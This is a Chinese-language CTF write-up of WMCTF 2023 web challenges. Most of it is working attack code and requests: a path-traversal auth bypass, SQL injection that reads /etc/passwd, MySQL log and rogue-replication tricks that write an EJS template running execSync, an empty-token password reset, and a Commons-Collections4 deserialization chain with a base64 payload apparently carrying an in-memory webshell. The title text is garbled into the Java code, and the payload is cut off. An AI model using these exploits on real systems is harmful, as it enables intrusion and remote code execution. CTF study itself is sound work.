wmctf2023 web writeup. in zh-CN | Random thoughts here

AnyFileRead

存在解析差异问题

用 /admin/../ 绕过

GET /admin/../flag HTTP/1.1
Host: 43.132.224.5:8888
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

WMCTF{bypass_auth_is_so_Exciting}

ezblog

目标要 rce

![](WMCTF 2023 web writeup/F8r7b3USUoOcMLxE3ETcnfqXnSd.png)

/post/:id/edit 可以注入，有 --secure-file-priv="" 权限

from requests import get
from urllib import parse
from re import search
proxies = {
    "http": None,
    "https": None
}

HOST = 'http://5bf11e7b-8550-4e62-a3f6-8b0f86c36a35.wmctf.wm-team.cn'

ROUTE = "/post/{}/edit".format(parse.quote('0 union select 666, 666, load_file(\'/etc/passwd\')').replace('/', '%2F'))

print(ROUTE)

r = get(HOST+ROUTE, proxies=proxies, allow_redirects=False)

print(r.status_code)

# print(r.content)

s = search(r'{.*}', r.text)

if s:
    print(s.group(0))

读 pin 码

/home/ezblog/.pm2/logs/main-out.log

有 pin 在 /home/ezblog/views/ 下写个满足条件的文件，然后 /api/debugger/template/test 路由渲染就行，但尝试发下存在权限问题，那重启容器，直接往 /home/ezblog/views/index.ejs 里写即可

# -*- encoding:utf-8 -*-

import requests

session = requests.session()

proxies = {
    "http": "http://127.0.0.1:8084",
    "https": "http://127.0.0.1:8084"
}
url = 'http://69e1df39-c6c8-4f77-8485-2a35297faefb.wmctf.wm-team.cn'
# url = 'http://localhost:3000'
authorization = "d0ae1a1c-e44e-448e-ba4c-f91cc903a317"


def execute_sql(sql):
    burp0_url = url + "/api/debugger/sql/execute"
    burp0_headers = {"Authorization": authorization}
    burp0_data = {"code": sql}
    r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxies)
    print(r.json()["data"])


def main():
    execute_sql("show variables like \"%general_log%\";")
    execute_sql("create database mysql;")
    execute_sql("set global general_log_file = '/home/ezblog/views/index.ejs';")
    execute_sql("""CREATE TABLE mysql.general_log(
event_time TIMESTAMP(6) NOT NULL DEFAULT CURRENT_TIMESTAMP(6),
user_host mediumtext NOT NULL,
thread_id int(11) NOT NULL,
server_id int(10) unsigned NOT NULL,
command_type varchar(64) NOT NULL,
argument mediumtext NOT NULL
) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log';""")
    execute_sql("SET GLOBAL log_output = 'FILE,TABLE';")
    execute_sql("set global general_log =1;")
    execute_sql("""select "<%=global.process.mainModule.constructor._load('child_process').execSync('/readflag').toString();%>";""")
    execute_sql("set global general_log =0;")


if __name__ == '__main__':
    main()

ez_java_again

看注释有个接口

/Imagefile?url1=upload/favicon.ico

访问说必须有 java 字符串且不能有 flag 字符串

![](WMCTF 2023 web writeup/Cy65bSQWOoDTloxtR2oc18Hmnie.png)

可以任意文件读

/Imagefile?url1=file:///etc/passwd%23java

/Imagefile?url1=file:///proc/1/cmdline%23java

/Imagefile?url1=file:///%23java

可以列出任意目录

![](WMCTF 2023 web writeup/MXPHb0yrdokyhfxjiducrpohnzb.png)

但读的 class 文件反编译不了

结果非预期了 file 协议直接双 url 编码绕

![](WMCTF 2023 web writeup/RygBbE1tpogmHgx3WnMcml2mnEh.png)

你的权限放着我来

存在任意用户密码重置

token 置为空即可

POST /api/change HTTP/1.1
Host: 28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn
Content-Length: 72
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn
Referer: http://28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn/change
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

newPassword=123456&confirmPassword=123456&token=&email=alice@example.com

![](WMCTF 2023 web writeup/WOHTbarilo2xVXxqgYFcu4zsnnf.png)

重置 jom@roomke.com 的密码即可获得 flag

![](WMCTF 2023 web writeup/WJvVbmXGhoRaV5x5GEGcxHrknRE.png)

flag{test_flag}

ez_blog2*

/post/:id/edit存在SQL injection，load_file 读取 pm2 日志：

from requests import get
from urllib import parse
from re import search

proxies = {
    "http": None,
    "https": None
}

HOST = 'http://120.26.39.182:3000'

filepath = '/home/ezblog/.pm2/logs/main-out.log'

ROUTE = "/post/{}/edit".format(parse.quote('0 union select 666, 666, load_file(\'' + filepath + '\')').replace('/', '%2F'))

print(ROUTE)

r = get(HOST+ROUTE, proxies=proxies, allow_redirects=False)

print(r.status_code)

s = search(r'{.*}', r.text)

if s:
    print(s.group(0))

获取 Token ：

curl -X POST http://120.26.39.182:3000/api/debugger/auth -d "username=debugger&password=cb853bc3-3dde-4c3a-a81c-82ef52147c19"

api/debugger/sql/execute执行SQL：

# -*- encoding:utf-8 -*-
import requests

session = requests.session()

proxies = {
    "http": None,
    "https": None
}
url = 'http://120.26.39.182:3000'

authorization = "cb853bc3-3dde-4c3a-a81c-82ef52147c19"


def execute_sql(sql):
    burp0_url = url + "/api/debugger/sql/execute"
    burp0_headers = {"Authorization": authorization}
    burp0_data = {"code": sql}
    r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxies)
    print(r.json()["data"])


def main():

    execute_sql("select @@version;")

    
if __name__ == '__main__':
    main()

本地搭建 mariadb ：

apt install mariadb-server
systemctl start maraidb
vim /etc/mysql/my.cnf

追加以下内容后systemctl restart mariadb


[mysqld]
bind-address = 0.0.0.0
server_id=10
log_bin=master-bin
binlog-checksum=NONE

进入mysql shell然后执行：

grant replication slave on *.* to 'replicater'@'%' identified by '123456';
CREATE DATABASE TEST;
USE TEST;
show master status \G;

记录 binlog 此时高度为628

![image-20230823210439310](WMCTF 2023 web writeup/image-20230823210439310.png)

create table tb_tmp01(id INT(11),name VARCHAR(25),deptId INT(11),salar1 FLOAT,salar2 FLOAT,salar3 FLOAT,salar4 FLOAT,salar5 FLOAT,salar FLOAT,s FLOAT);

编辑/var/lib/mysql/master-bin.000001，找到这一行改为如下：

select "<%=global.process.mainModule.constructor._load('child_process').execSync('/readflag').toString();%>" into outfile "/home/ezblog/views/114.ejs";

![image-20230823213644926](WMCTF 2023 web writeup/image-20230823213644926.png)

此时高度为879。执行如下内容连接master。

    execute_sql("select @@version;")
    execute_sql("create database mysql;")
    execute_sql("use mysql;")
    execute_sql("drop table gtid_slave_pos")
    execute_sql('''CREATE TABLE `gtid_slave_pos` (
       `domain_id` int(10) unsigned NOT NULL,
       `sub_id` bigint(20) unsigned NOT NULL,
       `server_id` int(10) unsigned NOT NULL,
       `seq_no` bigint(20) unsigned NOT NULL,
       PRIMARY KEY (`domain_id`,`sub_id`)
     ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Replication slave GTID state';''')
    execute_sql("stop slave;")
    execute_sql("change master to master_host='120.26.39.182', master_user='replicater', master_password='123456', master_log_file='master-bin.000001', master_log_pos=628;")
    execute_sql("start slave;")
    execute_sql("show slave status;")
    execute_sql("show databases;")
    execute_sql("use ctf;")

/console测试模板

得到 flag。

ez_challenge

有 commons-collections4-4.0 的依赖，直接打 CC4 的链子

生成 payload

package com.example.exp;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class ExpFin {

    public WMCTF 2023 web writeup void main(String[] args) throws Exception {

        ClassPool pool = ClassPool.getDefault();
        //内存马
        byte[] bytes = Repository.lookupClass(dawd.class).getBytes();
        Templates templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templatesImpl, "_name", "aaaa");
        setFieldValue(templatesImpl, "_tfactory", null);
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesImpl})
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesImpl});


        TransformingComparator transformingComparator = new TransformingComparator(instantiateTransformer);
        PriorityQueue priorityQueue = new PriorityQueue(2,transformingComparator);
        Field sizeField = PriorityQueue.class.getDeclaredField("size");
        sizeField.setAccessible(true);
        sizeField.set(priorityQueue,2);

        Field queueField = PriorityQueue.class.getDeclaredField("queue");
        queueField.setAccessible(true);
        queueField.set(priorityQueue,new Object[]{TrAXFilter.class,"bar"});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(priorityQueue);
        objectOutputStream.close();
        String res = Base64.getEncoder().encodeToString(barr.toByteArray());
        System.out.println(res);
    }
    private WMCTF 2023 web writeup void setFieldValue(Object obj, String field, Object arg) throws Exception{
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
}

写冰蝎马脚本

import requests

burp0_url = "http://119.45.178.147:30000/"
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://119.45.178.147:30000", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://119.45.178.147:30000/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"data": "rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjMAgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwc3IAQG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuQ29tcGFyYWJsZUNvbXBhcmF0b3L79JkluG6xNwIAAHhwc3IAP29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAKTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAMjHK/rq+AAAANAGoCAD9CAD+CAD/CgBrAQAKAGoBAQsBAgEDCwEEAQULAQQBBgoAagEHCgBqAQgHAQkKAAsBAAcBCggBCwoAagEMBwChCgANAQ0IAQ4KAEwBDwgBEAoAagERCAESCACXBwETCgAYARQLARUBAwoAGAEWCgA5ARcKADQBDQgBGAsBAgEZCAEaCgANARsKADQBHAgBHQgBHggBHwgAeQcBIAcBIQoAKAEiCgANASMKADQBJAoAagElCgAyASYKADQBJwoAagEoCgBqASkKAGoBKgcBKwgAsQcBLAcAsAkBLQEuCgA0AS8KATABMQcBMgoBLQEzCgEwATQHATUKAGoBNggBNwoAagE4CAE5BwC8CgE6ATsKAAsBPAoACwEZCAE9CgALAT4KAAsBPwoACwFACAFBCgA0AUIIAUMHAUQKADQBRQgBRggBRwgBSAcBSQoAUQEABwFKCgBTAUsHAUwKAFUBTQoAVQFOCgBRAU8KAFEBUAoAagFRCgFSATEKAVIBFgoANAFTBwFUCgA0AVUKAF4BVgoANAFXCgEwAQ0KAEwBWAoBMAFZBwFaCgBlAVYHAVsKAGcBXAoAKAFWBwFdBwFeAQANZ2V0VXJsUGF0dGVybgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABZMY29tL2V4YW1wbGUvZXhwL2Rhd2Q7AQAMZ2V0Q2xhc3NOYW1lAQAPZ2V0QmFzZTY0U3RyaW5nAQAKRXhjZXB0aW9ucwcBXwEABjxpbml0PgEAAygpVgEAB2NvbnRleHQBABJMamF2YS9sYW5nL09iamVjdDsBAAhsaXN0ZW5lcgEACGNvbnRleHRzAQAQTGphdmEvdXRpbC9MaXN0OwEABHZhcjIBABRMamF2YS91dGlsL0l0ZXJhdG9yOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBACRMamF2YS91dGlsL0xpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBAA1TdGFja01hcFRhYmxlBwFdBwFgBwFhAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcBYgEAEE1ldGhvZFBhcmFtZXRlcnMBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACmdldENvbnRleHQBABIoKUxqYXZhL3V0aWwvTGlzdDsBAARrZXkxAQADa2V5AQAIY2hpbGRyZW4BABNMamF2YS91dGlsL0hhc2hNYXA7AQAFdmFyMTIBAAtjaGlsZHJlbk1hcAEABHZhcjkBAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAR2YXI2AQABSQEABHZhcjQBABNbTGphdmEvbGFuZy9UaHJlYWQ7AQAEdmFyNQEABXZhcjE0AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAHdGhyZWFkcwcBMgcBCgcBEwcBIAcBYwEACVNpZ25hdHVyZQEAJigpTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQALZ2V0TGlzdGVuZXIBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWNsYXp6Qnl0ZQEAAltCAQALZGVmaW5lQ2xhc3MBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAAtjbGFzc0xvYWRlcgEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7BwErBwE1AQALYWRkTGlzdGVuZXIBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBAAdvYmplY3RzAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEACWxpc3RlbmVycwEACWFycmF5TGlzdAEAFUxqYXZhL3V0aWwvQXJyYXlMaXN0OwEABHZhcjcBAAppc0luamVjdGVkAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylaAQABaQEADWV2aWxDbGFzc05hbWUBABJMamF2YS9sYW5nL1N0cmluZzsHAUQHAQkBAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAMZGVjb2RlckNsYXNzAQAHZGVjb2RlcgEACWJhc2U2NFN0cgcBZAEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCAQAOY29tcHJlc3NlZERhdGEBAANvdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQACaW4BAB5MamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbTsBAAZ1bmd6aXABAB9MamF2YS91dGlsL3ppcC9HWklQSW5wdXRTdHJlYW07AQAGYnVmZmVyAQABbgcBSQcBSgcBTAEABWdldEZWAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAANvYmoBAAlmaWVsZE5hbWUBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAARnZXRGAQA/KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBABRMamF2YS9sYW5nL0NsYXNzPCo+OwcBLAcBVAEADGludm9rZU1ldGhvZAEADHRhcmdldE9iamVjdAEACm1ldGhvZE5hbWUBAF0oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdtZXRob2RzAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAFdmFyMTEBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAFdmFyMTABAApwYXJhbUNsYXp6AQASW0xqYXZhL2xhbmcvQ2xhc3M7AQAFcGFyYW0BAAZtZXRob2QBAAl0ZW1wQ2xhc3MHAWUHAO0HAVoHAVsBAApTb3VyY2VGaWxlAQAJZGF3ZC5qYXZhAQACLyoBAARhZHdhAQwsSDRzSUFBQUFBQUFBQUkxWGVYd1QxeEgrVnBLMXNyeUVJTUJnU01LVkJCK3loYm14d2NFQ0c3dXhUWUxBMURnTlhhOVcxb0lzQ1dsbE1HbWJIaWx0VTNxbWFadmVWK28yVFJzN3RMSUpEYUZuMnZRKzB2dSttOTd0UC8wblRiKzN1NVp0V1k3eHo5cmp2Wmx2WnI0M00rL3RVLzk3N0RLQVJ2eEhna2VObmxabFNCS1duMUNIMVZCQ1RRNkc5aVhVYkxZcnBVYjFqQXkzaEJ2RjFKbFFWczhNSjNRekZMSHZoL1JUT1QxcmRobFpVMDhLeVRJSml3WjFzME1YaWozcWtDNWhXWFZOMXpSdXhNd1l5Y0ZtV3QyWGluTFdmNFNROWEyRGV0TDB3Uy9obW9KMnI1cklVY0I3U05maUo1SStMSkt3MkVnYTVyNWMxa3dOM2FabTFDRUo3dXFhWGduWERqUnVpVFdxamJxMk14YmR2a1BmN3NNU1drZ3pCQW1CdWRZVkxNV3ljcml3blBpN0JXZ0x3YnVNcE42VEd4clFNNGZWZ1lRdU5GT2FtdWhWTTRaNGR3WTladHdncXJkTHNFYWtGYmpXRHcrdWs3Q3F1cXNrZjgzQ1JVbVRzR0tlZVFGeWd3Qlp4MUF5TnFYNytjdWtSdlNvaEp0dDNQbklieHNtZDVhTnBkbTVFeEkyWElVMi9Sdms4bGYzaDJ1S2ZSUnpBeEpjL1dFSkZWRTlScEtzY1laRDhjN091UW9LNmhBVTRkU1RRaWVjVG5Kc3FBbmpyQWhvNmJSRzJ4bE5UNXRHS2lsakV4MXdYTlV5STJrekZkcG5wT09rUjRJdm8yZlRxV1NXOUJkekVUZk5kS2lEbDBKWXRpUzE1S3llelJKYXd0cjVsU3dKQ3J0VEF5ZEVEbGl1NVV3akVlcFcwd0xFQ1VEQ3hnVXRXNExVV2JjZzRUSW9kdE5WNGNuWXd4UzR1cUJsM0NMaGh1ZVBWVVlyYTNSV21ETDJjU2hpcXRwSnZqbDV2b1NGT05zVDh1aVU4bnl4Y2VuYmNjQ1AzZWhRSU1Qblo0bTlRRUo1b2FZTHlUeXJIRXYwQndWZDZLNUFDM29VS0RiUWJTeU9ZamtaaDVnZFdpcHBxa2FTS2JsNlZnbkcxVXhFT0piVTlPYWFZd29PNDRnZkViQlNLZ2VuU1d2UHBJWUtFZDYrY0g3WmtSWVRNVzhlS25naCtvVC94OWpzTEU2ZHBGdy9oOHc1YWFuZ0RyeElzSEFuMTJONnlUclViTnhhdGhmN29lSTZIM1l4ZjlNNXVyOXpadndIQjA3b210azhkNlJtN3BDQ0tQUUs3RWZNaHkwK2JHUFI1M3hnUmZpSTYzVGlqU1dXcmdSNHI0SUVoaW9RQm9OMHQ3WkZmRWc3TlY5VTJUS1lFQlhrcERPWk5WV3Vrb1NhZWRPanVDc29NSkh6STR0aENXdG1DV1RUdXNiRTFESzZlYXMrRXVHYmpET01oSWJDSTZiT05QRlUxL1NIRlp6RlhTSWZYbUszc2hLR2UwVm5mcGtmSTdpYlNtS2ZFS0tkdG1SVzEzSVp3eHdKMFlnbCtncThVdmp6cWxsNWFyTWk0OVcyQTA3clhGcGRxbTIrQnEvMTR4eGV4ejVVTkNuajlmYldPR1Bia0ZBMUY2V3dvN3dCYi9UalBONGtNbStkWFlLSG5CSmNOYVZtcEVMaFhDeW1aL1NvUFVlOXQrSStrWEJ2WTQyVWxwSHhkcXNocTFHeFh5cDRwNmpPZCtBQkNjcUFtdFczYjkydmE5Yk9YbGxxS1FYdDc4WjdoRmZ2WlhPTnB0cU5wSnJnZGlxMkhqSDVmbnhBa1BoQkJSdFJMY1ErekJSSjZxZW5VMlQyZWFLUXZ3L2lveUxnVVdLeFJOVkVWdXhuSmRLVGZlRGplRWp3L0FrV1pHSC9vWGdaT1dydlhiQ0lTalN0Z2hPZndpUEM1ekduQzl1elBhbElUb3UzRzNvaU9tTzdlNVFaTmF4bXRrM3RUdlBMTnR1U20yWWZaUnliOWx5amZkdk1uSmdoa3RGakNjcUVMRGhIY2dzN1NZa3Rmc1U4V2pJZVp6cVRHSzVxUW1VU1dLTVM2aGRvNDdOTkszZ0NWOFRxZk00K0hrWnlhVDJqQ2RNS3ZpQ1MvankrV0xSY3Mwcnd5MzVjd0pQVXplcG1xNmFKN21pZnhhcVBDWUd2NGlrL0x1TnJiRGNFTDlwam5xL25mUVBmRklyZjR0clRtN05uUlVaYTJadVpPb3NVblZMRVFZSG5NaVozTnBkc0dES3lXa080TmRJMmxmUVpINTRtUml6bEhIMXZXb0NscWNML0lYNGtPUGd4YThpMmI1ZWNEeisxSzdkYk4rTXBzcjYzQkY3L0hMeFM2MkFqME5UUDhRdGg2cGNTVnM0bkplUFhMQ0lqT1p3NnlSaDJsU0N6L3lyNS9TMSs1OGR2OEhzWnRVNVRiQkFiV0VQWWFoUSsvTW5lRWd2a1BVTzdOZ0UrL0pWZFpyZVdzQTduQ2hhTFU3WUwvNkJDSkpYTGFIcTdJUkpnZVZpUEcwbnFUbjJCTkFnaldFZFJEd2pHbjErYzlmbXBvL0NKUnhLT2xQTnRNZS9pengyb0dMTWUvT0tZTVdmeW1xbEoybmNtQTg2a054QzRnTXB4NjFrU1h3SE8vQmJlaFVSWjdRU3VGOU11ckxRZ1hMeXVwMXNiVUdXNVl3bGhGVlk3QURjNEFDMlVGTExlMnJvSnJDOUd1Sms2R3kyRVNsdktRUkJQYTdEV01yNEJOenBZMnl4dDRrL0RlQzNEZFRNZ3BBSUVNNVlHQkFTYnJ3T3hoeTRMcWZMYU9uZmQ1UWswakJWQk5jeUFLaTlBbGFNR3RSWlVhTW9iNlQ1cXlKd2JyOHVqOHdwYXVvT1R1UFVpRHJvd2lkdnpPUG9BN3E4TlRxQy9KM2dSeHlVMGVTNUI3WnZBUUZOWlZWbEE0K0NnRzBmNUdLOHZQQnBWSHVmWkV6ajVLQ292SXVWRzROUWtUamQ1cTd4bGx6RFN4OUU4WGhvNE5ZR1g1M0hQSmJqNmF2TzRONDgzVCtBdFZkNWF3dDR2SVk5MzVmRytQRDZVeDBmeStGaFZXUjRQSHgxRldaTjNGSjZlY1FZWHdTZ2U0Z2V6RHcvakVkN2RGZ1h0V0dLdE9ZOU1ESDA3RjJBSG1kdkorVjA4QlRmaEFKcXB1UWZIdWF3eDNJSzdzSmM0WVNLMUVxZWRTUHN4aGc2THdnNlNFK1A0R213bVVXdFpwVnV3bFhhcWNRL1J0M01kR3FtL2craGxnc1FDMWVQT3F2bTRzZTJpVFJmYXJFVHhQRWN6WGhrdUdidGx0TWpZS3lNczA2QWtvL0cva1BqY0tKYVM1MU5lUDBrZFVUT04xcXAzY0VSWUNVcmRkUUZ0RXVPQk9DOVhzTGQ3RkZVOWRUUGVmRTJlVWJqNUh4eXpFbmNKcTYwUnl4bkZlZ0hQSk9DbXlIR0IralNqRWFnN3BXNnhCajMxZ1hNUG9yS2U2ZkI1SWkxcTh0VG44YVdlMGVlZUNUNEo1Ukl1OUxFQ3Z2SkUwSlBIMTROVStQWVkvVnZFZXE3a2RtRHp2NW1GQkJ3VW53ZGs3eEJuRDNQK0NDVjZPWDhVMXpPNnRlaG5DdDZCZXR4SitlTVcxMXZweDByK1BvM1BNR3A2eEF5WXNOamN5V1JjUmpzdU1uNFJqL0V1YUxxRXo5S2k0SFVKUE05Q2xuRlp4dmtlR1JmS2xSblVTZUp3NHdUN0xCZFJCRHNTK01Fa2Z0SWREUHpNOHpqTzk3a0RrVWdldndveXkvaCtyczlkeDljL1hNRWZDLzlqM1lFL1U0UHMvTVZORFFwTHZKK2pWSk9uaWx6Y0cvamJUS1FxejN3NFZubHVvbHRUMmJxS0xnRTZyekdPRFpLTk9PTTErSzExd21LbGhUTmU5b2J2TUZvWFoxcXRKemZuNi9GZDh1T2h4Z0Z5OWoycjJFY0tHVGlDNzF1Y3RkbE40WlJnYkpvVUgvNWU2STVyWWY5NUp2SFBjYXZqVExlMlZiUzBtaVAvc2hyTXYvOFBtWmIyNXFNU0FBQT0MAHcAeAwAkwCUBwFgDACPAWYHAWEMAWcBaAwBaQFqDACtAK4MALkAugEAE2phdmEvdXRpbC9BcnJheUxpc3QBABBqYXZhL2xhbmcvVGhyZWFkAQAKZ2V0VGhyZWFkcwwA6ADdDAFrAG0BABxDb250YWluZXJCYWNrZ3JvdW5kUHJvY2Vzc29yDAFsAW0BAAZ0YXJnZXQMANwA3QEABnRoaXMkMAEAEWphdmEvdXRpbC9IYXNoTWFwDAFuAW8HAXAMAXEArgwBcgFzAQAPU3RhbmRhcmRDb250ZXh0DAF0AXUBABVUb21jYXRFbWJlZGRlZENvbnRleHQMAXYBdwwBeABtAQAZUGFyYWxsZWxXZWJhcHBDbGFzc0xvYWRlcgEAH1RvbWNhdEVtYmVkZGVkV2ViYXBwQ2xhc3NMb2FkZXIBAAlyZXNvdXJjZXMBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAHcBeQwBegF7DAF8AXcMAHMAbQwBfQF+DAF/AWoMAHQAbQwAyADJDADOAM8BABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAA9qYXZhL2xhbmcvQ2xhc3MHAYAMAYEAtAwBggGDBwFlDAGEAYUBABBqYXZhL2xhbmcvT2JqZWN0DAGGAYcMAYgBiQEAE2phdmEvbGFuZy9UaHJvd2FibGUMAMEAwgEAG2FkZEF